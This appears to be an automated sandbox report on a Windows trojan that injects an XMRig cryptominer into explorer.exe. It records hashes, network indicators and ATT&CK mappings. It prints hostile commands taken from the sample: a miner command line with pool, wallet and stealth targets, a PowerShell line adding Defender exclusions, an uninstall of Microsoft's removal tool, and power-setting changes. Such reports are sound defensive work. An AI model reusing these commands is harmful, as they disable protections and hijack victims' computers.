            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EXPLORER.EXE --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER=48SNGK2YLREZCJVUYXKT5QUBH4ICDG8SBWK9PX624HM1E8Z2RIW8EKXCH2TT35OD6W2PHVVQ3RBXCCTQKZGDXMD5TJJQUEQ.KARIG --PASS= --CPU-MAX-THREADS-HINT=50 --CINIT-WINRING=HNKCGWELKFZN.SYS --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION=3.4.1 --TLS --CINIT-IDLE-WAIT=1 --CINIT-IDLE-CPU=100 --CINIT-ID=LXSQSYGUEJXGUMUJR
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXEVBE;.JS;.JS
            Source: explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEOCESSORA,
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEGF
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000003.1831894727.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: explorer.exe, 00000025.00000003.1831894727.0000000000F71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXELXSQSYGUEJXGUMUJ
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5073
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4741
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7620
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2102
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Dropped PE file which has not been started: C:\Windows\Temp\hnkcgwelkfzn.sys
            Source: C:\Users\user\Desktop\aA45th2ixY.exe API coverage: 3.2 %
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe API coverage: 3.2 %
            Source: C:\Windows\System32\conhost.exe API coverage: 1.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580 Thread sleep count: 5073 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584 Thread sleep count: 4741 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep time: -6456360425798339s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep count: 7620 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148 Thread sleep count: 2102 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260 Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\explorer.exe TID: 648 Thread sleep count: 135 > 30
            Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWT
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\aA45th2ixY.exe Code function: 0_2_00007FF6E17D1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 0_2_00007FF6E17D1160
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Code function: 23_2_00007FF7B9E81160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 23_2_00007FF7B9E81160
            Source: C:\Windows\System32\conhost.exe Code function: 35_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 35_2_0000000140001160

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exe Network Connect: 51.15.58.224 10343
            Source: C:\Users\user\Desktop\aA45th2ixY.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Memory written: PID: 3444 base: 140000000 value: 4D
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Memory written: PID: 3444 base: 140001000 value: NU
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Memory written: PID: 3444 base: 140665000 value: DF
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Memory written: PID: 3444 base: 140834000 value: 00
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Memory written: PID: 3444 base: D1D010 value: 00
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Thread register set: target process: 1696
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Thread register set: target process: 3444
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe Process created: C:\Windows\explorer.exe explorer.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
MITRE ATT&CK Matrix (a leading number marks a technique matched by this analysis; unnumbered entries are the standard matrix layout)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 11 Windows Management Instrumentation; 1 Service Execution; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 11 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Windows Service; 311 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 131 Virtualization/Sandbox Evasion; 311 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 File Deletion
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 321 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 13 System Information Discovery; Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1527537, Sample: aA45th2ixY.exe, Start date: 07/10/2024, Architecture: WINDOWS, Score: 100)

Signatures on the sample node: Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; Sigma detected: Stop EventLog; 3 other signatures
DNS: xmr-eu1.nanopool.org (DNS related to crypt mining pools)

aA45th2ixY.exe
  dropped: C:\ProgramData\...\kgpcbqezuufy.exe (PE32+)
  signatures: Uses powercfg.exe to modify the power settings; Adds a directory exclusion to Windows Defender; Modifies power options to not sleep / hibernate
  started: powershell.exe (Loading BitLocker PowerShell Module) -> conhost.exe
  started: cmd.exe -> conhost.exe, wusa.exe
  started: powercfg.exe -> conhost.exe
  started: 7 other processes -> conhost.exe, 6 other processes

kgpcbqezuufy.exe
  dropped: C:\Windows\Temp\hnkcgwelkfzn.sys (PE32+)
  signatures: Multi AV Scanner detection for dropped file; Injects code into the Windows Explorer (explorer.exe); Modifies the context of a thread in another process (thread injection); Sample is not signed and drops a device driver
  started: explorer.exe
    network: 51.15.58.224 (ports 10343, 49731; OnlineSASFR, France)
    signatures: System process connects to network (likely due to code injection or exploit); Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  started: powershell.exe -> conhost.exe
  started: cmd.exe -> 2 other processes
  started: 5 other processes -> 4 other processes

Antivirus detection, submitted file (Source | Detection | Scanner | Label):
aA45th2ixY.exe | 58% | ReversingLabs | Win64.Trojan.MintZard

Antivirus detection, dropped files (Source | Detection | Scanner | Label):
C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | 58% | ReversingLabs | Win64.Trojan.MintZard
C:\Windows\Temp\hnkcgwelkfzn.sys | 5% | ReversingLabs |

No Antivirus matches
No Antivirus matches
No Antivirus matches
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
xmr-eu1.nanopool.org | 162.19.224.121 | true | true | | unknown
URLs (Name | Source | Malicious | Antivirus Detection | Reputation):
http://crl.cloudflare.com/origin_ca.crle.s6$ | explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.cloudflare.com/origin_ca.crl0 | explorer.exe, 00000025.00000002.4209894132.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.cloudflare.com/origin_ca | explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.cloudflare.com/origin_ca0 | explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.cloudflare.com/origin_ca.crl | explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
51.15.58.224 | unknown | France | 12876 | OnlineSASFR | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1527537
Start date and time: 2024-10-07 01:37:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 43
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: aA45th2ixY.exe (renamed because the original name is a hash value)
Original Sample Name: 40c59f3c50480cd8732770ef31a0116865f62c75501dc1afe3a3a9ff89f39d8e.exe
Detection: MAL
Classification: mal100.spyw.evad.mine.winEXE@58/12@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 5
• Number of non-executed functions: 27
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: aA45th2ixY.exe
Simulations (Time | Type | Description):
19:38:09 | API Interceptor | 29x Sleep call for process: powershell.exe modified
Context for IP 51.15.58.224 (Associated Sample Name | Detection | Threat Name):
25C1.exe | malicious | Glupteba, Xmrig
8EbwkHzF0i.exe | malicious | Xmrig, zgRAT
file.exe | malicious | Glupteba, SmokeLoader, Xmrig
file.exe | malicious | Parallax RAT, Phonk Miner, Xmrig
file.exe | malicious | Parallax RAT, Phonk Miner, Xmrig
file.exe | malicious | Phonk Miner, Xmrig
file.exe | malicious | Xmrig
file.exe | malicious | Xmrig
file.exe | malicious | Xmrig
file.exe | malicious | Phonk Miner, Xmrig
Context for domain xmr-eu1.nanopool.org (Associated Sample Name | Detection | Threat Name | Resolved IP in that analysis):
S0FTWARE.exe | malicious | Go Injector, Vidar, Xmrig | 162.19.224.121
Gw2G72kSsY.exe | malicious | Xmrig | 51.15.58.224
file.exe | malicious | Xmrig | 163.172.154.142
BWP2uPDDxw.exe | malicious | Xmrig | 163.172.154.142
BkkZPdT1uc.exe | malicious | Xmrig | 54.37.232.103
Chrome.exe | malicious | Xmrig | 51.15.58.224
SetLoader.exe | malicious | Xmrig | 51.15.58.224
ekBTbONX85.exe | malicious | Xmrig | 51.15.58.224
yLfAxBEcuo.exe | malicious | Cryptbot, Vidar, Xmrig | 212.47.253.124
SecuriteInfo.com.Win64.Evo-gen.9790.15318.exe | malicious | Xmrig | 51.15.65.182
Context for ASN OnlineSASFR (Associated Sample Name / URL | Detection | Threat Name | IP in that analysis):
http://ak437453-76542337354.com/ | malicious | Unknown | 212.129.3.112
https://wtm.entree-plat-dessert.com/r/eNpNj1uTojAQhX8N+6aYG4SHqS0VWHXB9Vbj4stUCAGDXJyQ6OKv38zbdPXDV+d096l+ugGEHqAuED7GiAhQAMooRDiABQc5LH3MCBXCBRQRF/vEzSHiXglnyKdF4RHEwAx6EAQ5w7aC0vVcQNze/WnerlrfBwfNHRjbZlybacuUFLxhUolpqazKjRxkJyxpprSYMDPJVc/7Rk4GZriYcKPUOOFWcuASYD/wCJyy4e6gmOmPVhTStA4KRaE/bIIDPdZab2E9bonJqrPus+F925pGy+8DQ28UF1/LnVZC3BumCzEMQukfBX/zy8terrvuDI76doov9WG1mh1q7Z19Ss3Yb45ZwoN2mR6jT/gv/zsm6EqiYVNXy/EQZy/jwEXrD3tCSLV+be2H/q7u9CuDFsPPMLvmyfr3fPt4l+v9Zb5vg67LCKw31zGsM/JK8GkbJBEGYeWd0hSI4hzT3QPXvyL5x95+7goVLhqqWHqoUVJ9xW00jWrQL3OSnld9f8tv7HEL/wMooptN | malicious | Unknown | 212.129.3.112
81zBpBAWwc.exe | malicious | RHADAMANTHYS | 163.172.136.118
WannaCry.bin.zip | malicious | Conti, Wannacry | 163.172.131.88
http://d-mj-hood-83.limesurvey.net/182116/ | malicious | Unknown | 51.158.227.154
file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | 195.154.173.35
SecuriteInfo.com.Trojan.Win32.Crypt.31282.17969.exe | malicious | Socks5Systemz | 195.154.173.35
SecuriteInfo.com.Gen.Heur.Munp.1.11072.7602.exe | malicious | Socks5Systemz | 195.154.173.35
report_209.pdf | malicious | Unknown | 62.210.196.157
g3V051umJf.html | malicious | Unknown | 212.129.25.206
                                            No context
Context for dropped file C:\Windows\Temp\hnkcgwelkfzn.sys (Associated Sample Name | Detection | Threat Name):
1mqzOM6eok.exe | malicious | Xmrig
updater.exe | malicious | Xmrig
7QiAmg58Jk.exe | malicious | Metasploit, Meterpreter, Xmrig
LnK0dS8jcA.exe | malicious | Xmrig
file.exe | malicious | Xmrig
SecuriteInfo.com.Win64.Evo-gen.13032.15171.exe | malicious | Xmrig
file.exe | malicious | Amadey, BitCoin Miner, SilentXMRMiner
S0FTWARE.exe | malicious | Go Injector, Vidar, Xmrig
Gw2G72kSsY.exe | malicious | Xmrig
file.exe | malicious | Xmrig
Dropped file

Process: C:\Users\user\Desktop\aA45th2ixY.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2684712
Entropy (8bit): 6.559876563234829
Encrypted: false
SSDEEP: 49152:3GP12M443HsaixDif+GwpQ0WoIujEmXZpD3F93lRg7OE+Goqe1HFl:2m6HsaCDifuZW1cEIpZ93l3EylPl
MD5: 6694E88CD0B76E774385E450B3027F35
SHA1: 5049C878BBBBFBEEE9A38489086CB77A94C8F663
SHA-256: 40C59F3C50480CD8732770EF31A0116865F62C75501DC1AFE3A3A9FF89F39D8E
SHA-512: B404E98F602FA09D22B08065AF32FEACBE8C96C9DBF677E50BB420CD80CB217864A1564F7A931FC747E78AEFF3691EA1E6D3A58ACFDDDFAA234E21D5B43C14FD
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 58%
Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."......z....(.....@..........@..............................)...........`.................................................`...<.....(. )....(.......(.(K....).x...............................(.......8...............X............................text...6y.......z.................. ..`.rdata...............~..............@..@.data.....'.......'.................@....pdata........(......z(.............@..@.00cfg........(......|(.............@..@.tls..........(......~(.............@....rsrc... )....(..*....(.............@..@.reloc..x.....).......(.............@..B........................................................................................................................................................................................................................................................................................................
Dropped file

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllul/nq/llh:NllUyt
MD5: AB80AD9A08E5B16132325DF5584B2CBE
SHA1: F7411B7A5826EE6B139EBF40A7BEE999320EF923
SHA-256: 5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
SHA-512: 9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
Malicious: false
Preview: @...e................................................@..........
